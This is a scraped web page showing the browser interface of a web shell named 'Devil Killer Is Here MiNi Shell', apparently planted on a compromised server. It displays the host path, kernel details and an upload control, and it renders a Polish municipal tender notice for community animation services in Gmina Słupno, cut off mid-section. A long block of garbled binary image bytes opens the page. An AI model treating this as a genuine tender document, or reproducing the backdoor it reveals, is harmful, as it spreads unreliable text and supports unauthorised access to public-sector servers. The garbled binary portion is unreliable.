JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220624/0022398801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Praca środowiskowa pn. „Prowadzenie animacji społeczności lokalnych na terenie Gminy Słupno” w ramach projektu<br/> „Centrum Usług Społecznych w Gminie Słupno” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Społecznych w Słupnie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 610006559</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Warszawska 26A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Słupno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-472</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 261 91 78</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cus.slupno.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://cus.slupno.eu/www/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Praca środowiskowa pn. „Prowadzenie animacji społeczności lokalnych na terenie Gminy Słupno” w ramach projektu<br/> „Centrum Usług Społecznych w Gminie Słupno” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-695de3b6-f3ba-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00223988</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00131546/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Praca środowiskowa pn. Prowadzenie animacji społeczności lokalnych na terenie Gminy Słupno&#34; w ramach projektu Centrum Usług Społecznych w Gminie Słupno.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Wiedza Edukacja Rozwój </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://cus.slupno.eu/bip/index.php?c=article&amp;id=55 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">11.1	W Postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej sekretariat@cus.slupno.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.2	Wykonawca zamierzający wziąć udział w Postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. <br/>11.3	Zamawiający przekazuje link do Postępowania oraz ID Postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>11.4	Postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>11.5	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>11.6	Składanie oświadczeń, zawiadomień, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://cus.slupno.eu/bip/index.php?c=article&amp;id=55</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">21.6.	Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>21.6.1.	administratorem Pani/Pana danych osobowych jest: Centrum Usług Społecznych w Słupnie z siedzibą w Słupnie przy ul. Warszawska 26 A, 09-472 Słupno, tel. 24 261 91 78,<br/>21.6.2.	inspektorem ochrony danych osobowych w Centrum Usług Społecznych w Słupnie jest Ewa Foryszewska - Jarzyńska, z którym kontakt jest możliwy pod adresem iodo@cus.slupno.eu<br/>21.6.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c i f RODO, przy czym za prawnie uzasadniony interes Zamawiającego wskazuje się konieczność przeprowadzenia Postępowania i wykonania umowy zawartej w wyniku udzielenia zamówienia będącego przedmiotem Postępowania, w celu: <br/>21.6.4.	związanym z Postępowaniem w ramach projektu pn.: „Centrum Usług Społecznych w Gminie Słupno” wyłonienia Wykonawcy oraz udzielenia zamówienia publicznego poprzez zawarcie umowy w sprawie zamówienia publicznego objętego Postępowaniem, wykonania umowy zawartej na skutek przeprowadzenia Postępowania i dochodzenia wszelkich roszczeń wynikających z przedmiotowej umowy;<br/>21.6.5.	przechowywania dokumentacji Postępowania na wypadek kontroli prowadzonej przez uprawnione organy i podmioty, jak również w celu posługiwania się nią w celach postępowań sądowych lub/i administracyjnych lub/i karnych i innych związanych z niniejszym Postępowaniem i umową obejmującą jego wykonanie; <br/>21.6.6.	w celu archiwizacji dokumentacji Postępowania o udzielenie niniejszego zamówienia publicznego i dokumentacji związanej z wykonaniem umowy zawartej na skutek udzielenia niniejszego zamówienia publicznego, a następnie jej usunięcia i zniszczenia;<br/>21.6.7.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b RODO, gdy przetwarzanie jest niezbędne do wykonania umowy, której jest Pan/Pani stroną, lub do podjęcia działań na Pani/Pana żądanie przed zawarciem umowy;<br/>21.6.8.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Prawo zamówień publicznych, podmioty kontrolujące, które zgodnie z obowiązującymi przepisami uzyskają wgląd do dokumentacji postępowania oraz podmioty i instytucje, które mają do tego wglądu prawo w toku realizacji zamówienia, skład orzekający Krajowej Izby Odwoławczej oraz jej pracownicy w przypadku wniesienia odwołania oraz pełnomocnicy stron postępowania odwoławczego, skład orzekający oraz pracownicy sądu okręgowego w procesie skargowym, jeżeli ten będzie miał miejsce oraz inne podmioty, jeżeli przepisy szczególne tak stanowią;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOiK.262.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 55000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest prowadzenie animacji społeczności lokalnej na terenie Gminy Słupno w ramach projektu: „Centrum Usług Społecznych w Gminie Słupno” współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Wiedza, Edukacja, Rozwój. Działanie 2.8. Rozwój usług społecznych świadczonych w środowisku lokalnym4.	Szczegółowy opis przedmiotu zamówienia:<br/>a)	Animacje społeczności lokalnej będą prowadzone w 17 społecznościach/sołectwach objętych Programem Wdrażania CUS tj.: Barcikowo, Bielino, Borowiczki Pieńki, Cekanowo, Liszyno, Mijakowo, Mirosław, Miszewko Stefany, Miszewko Strzałkowskie, Nowe Gulczewo, Ramutowo, Rydzyno, Sambórz, Słupno, Stare Gulczewo, Szeligi, Wykowo.<br/>b)	Animacje w zależności od ich rodzaju powinny obejmować w szczególności:<br/>	nawiązanie kontaktów z członkami lokalnej społeczności w celu określenia ich potrzeb i zasobów,<br/>	motywowanie do podejmowania inicjatyw lokalnych mających na celu poprawę warunków życia i zmianę zachowań społecznych,<br/>	motywowanie do nawiązywania kontaktów międzysąsiedzkich,<br/>	pobudzanie mieszkańców do aktywności obywatelskich, kulturalnych i sportowo-rekreacyjnych, ze szczególnym uwzględnieniem dzieci i młodzieży,<br/>	organizowanie działań samopomocowych i wolontarystycznych,<br/>	identyfikacja i wspieranie lokalnych liderów,<br/>	budowanie partnerstw i lokalnych sieci wsparcia w zakresie wspierania prowadzonych działań,<br/>	organizowanie warsztatów, spotkań, imprez integracyjnych itp. z uwzględnieniem szerokiej partycypacji mieszkańców,<br/>	podejmowanie działań interwencyjnych i wspierających na rzecz osób zagrożonych wykluczeniem społecznym,<br/>	kształtowanie i promowanie „dobrych praktyk” w zakresie realizowanych inicjatyw lokalnych,<br/>	motywowanie mieszkańców do współorganizowania i uczestnictwa w akcjach społecznościowych odbywających się na terenie Gminy Słupno,<br/>c)	W ramach zadania Zamawiający oczekuje od Wykonawcy zatrudnienia na podstawie umowy zlecenia lub umowy co najmniej 2 animatorów w zakresie: animacji kulturalnej, animacji sportowo-rekreacyjnej i animacji społecznej. <br/>d)	Animatorzy będą pracować na podstawie przekładanych planów kwartalnych zatwierdzonych przez Organizatora Społeczności Lokalnej CUS.<br/>e)	Wszystkie działania animacyjne musza być realizowane przy współpracy z Organizatorem Społeczności Lokalnej – Centrum Usług Społecznych w Słupnie oraz mieszkańcami i podmiotami lokalnymi.<br/>f)	Zamawiający i Wykonawca w celu koordynacji procesu realizacji zamówienia powołają Grupę Roboczą w składzie:<br/>	ze strony Zamawiającego: Dyrektor Centrum Usług Społecznych w Słupnie i Organizatorem Społeczności Lokalnej,<br/>	ze strony Wykonawcy osoba wyznaczona do kontaktów z Zamawiającym,<br/>	Grupa Robocza spotykać się będzie w celach i w terminach wskazanych w niniejszym Opisie Przedmiotu Zamówienia:<br/>spotkanie 1 Grupy Roboczej odbędzie się nie później niż do dnia 15.07.2022 r.<br/>spotkanie 2 Grupy Roboczej odbędzie się nie później niż do dnia 09.09.2022 r.<br/>spotkanie 3 Grupy Roboczej odbędzie się nie później niż do dnia 09.12.2022 r.<br/>spotkanie 4 Grupy Roboczej odbędzie się nie później niż do dnia 09.03.2023 r.<br/>spotkanie 5 Grupy Roboczej odbędzie się nie później niż do dnia 18.05.2023 r. – spotkanie końcowe podsumowywujące. <br/>g)	Z uwagi na charakter przedmiotu zamówienia związaną z animacją społeczności lokalnej i konieczności znajomości otoczenia Zamawiającego, Zamawiający nie przewiduje spotkań online. <br/>h)	Wykonawca ma obowiązek informowania uczestników o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz budżetu państwa.<br/>i)	Wykonawca świadczący usługi jest zobowiązany do prowadzenia i pokazywania na zadanie dokumentacji związanej z realizacją zadania oraz informowania o występujących problemach i trudnościach w formie pisemnej.<br/>j)	Animacje mogą być prowadzone w przestrzeniach otwartych oraz obiektach będących w zasobach Gminy Słupno oraz innych podmiotów i organizacji. Wykonawca zobowiązany jest do uzyskania zgody właściciela/zarządcy terenu lub obiektu na prowadzenie działań animacyjnych. <br/>k)	Działania animacyjne powinny być prowadzone w uzgodnieniu z Organizatorem Społeczności Lokalnej CUS oraz na podstawie obowiązujących przepisów prawnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Lp.	Kryterium	Liczba punktów (waga)<br/>1.	Kryterium 1 – Cena	60<br/>2.<br/>	Kryterium 2 – Doświadczenie animatorów<br/>	40<br/>SUMA	100<br/><br/>16.6.1.	Kryterium nr 1 „Cena” najwyższą liczbę punktów (60) otrzyma oferta spełniająca w najwyższym stopniu wymagania, spośród ofert niepodlegających odrzuceniu, otrzyma maksymalną liczbę punktów. Pozostałym ofertom, spełniającym wymagane kryteria przypisane zostanie proporcjonalnie mniejsza liczba punktów. Wynik będzie traktowany jako wartość punktów oferty. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów. – odpowiednio w części zamówienia, na którą składa jest oferta - zawierająca najniższą cenę brutto, a każda następna odpowiednio zgodnie z wzorem:<br/><br/> Cena oferty najniższej<br/> Liczba punktów oferty = --------------------------------- x 60<br/> Cena oferty ocenianej<br/><br/>16.6.1.1.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług - Zamawiający, dla celów zastosowania kryterium ceny lub kosztu doliczy do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. <br/>16.6.1.2.	Wykonawca składający ofertę, o której mowa w pkt 16.1.1.1., ma obowiązek:<br/>16.6.1.2.1.	poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>16.6.1.2.2.	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>16.6.1.2.3.	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>16.6.1.2.4.	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie animatorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki:<br/>8.2.1	Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>8.2.2	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>8.2.3	Sytuacja ekonomiczna lub finansowa;<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.1.1	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie określonym przez Zamawiającego. <br/>9.1.1.1	Oświadczenie to Wykonawca składa zgodnie z wzorem stanowiącym załącznik nr 2 do SWZ. <br/>9.1.1.2	Oświadczenie stanowi dowód potwierdzający, na dzień składnia ofert, brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, który tymczasowo zastępuje wymagane przez Zamawiającego podmiotowe środki dowodowe wskazane w pkt 9.2.<br/>9.1.1.3	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 9.1.1., składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>9.1.1.4	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 9.1.1., także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>9.1.2	Zobowiązanie podmiotu udostępniającego zasoby <br/>9.1.2.1	W przypadku polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca składa zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu.<br/>9.1.2.2	Wzór zobowiązania stanowi Załącznik nr 3 do SWZ.<br/>9.1.3	Oświadczenie, o którym mowa w art. 117 ust. 4 Ustawy Pzp <br/>9.1.3.1	W przypadku Wykonawców wspólnie ubiegających się o zamówienie Wykonawcy ci składają - oświadczenie, o którym mowa w art. 117 ust. 4 Ustawy Pzp.<br/>9.1.3.2 Wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>9.1.4	Dokumenty potwierdzające umocowanie do reprezentowania <br/>9.1.4.1	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawca składa odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub 